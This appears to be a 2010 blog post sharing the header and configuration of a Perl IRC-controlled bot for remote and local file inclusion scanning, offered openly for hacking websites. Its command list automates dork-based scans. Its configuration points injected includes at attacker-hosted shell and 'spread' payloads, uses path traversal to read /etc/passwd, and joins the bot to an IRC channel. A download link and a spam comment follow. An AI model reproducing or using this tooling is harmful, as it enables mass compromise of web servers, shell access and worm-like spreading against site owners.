Wednesday 13 January 2010

PittbuLL Scanner

#!/usr/bin/perl
# Release Name : XxX-SuperScan-XxX
# Author : arianom killnine
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; kiLL-9 CreW, arianom, kiLLer.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.
# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################
my $response = "http://kill-9.co.tv//arianom/response.txt?"; # included in zip as response.txt
my $test = "http://kill-9.co.tv//arianom/test.txt?"; # included in zip as test.txt
my $printcmd = "http://kill-9.co.tv//arianom/sh.txt?";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://kill-9.co.tv//arianom/spread.txt?";
my $nickname = "kiLLeR|".(int(rand(999)));
my $ident = "kiLL";
my $channel = "#kill-9";
my $server = "irc.killer.server.or.id";
my $port = 6667;
#################
#[Configuration]#
#################


Download [full + id]

1 comments:

  1. Very nice post. I just stumbled upon your blog and wanted to say that I've truly enjoyed browsing your blog posts. After all I will be subscribing to your rss feed and I hope you write again soon!

    Here is my page: Bmi chart for men

    ReplyDelete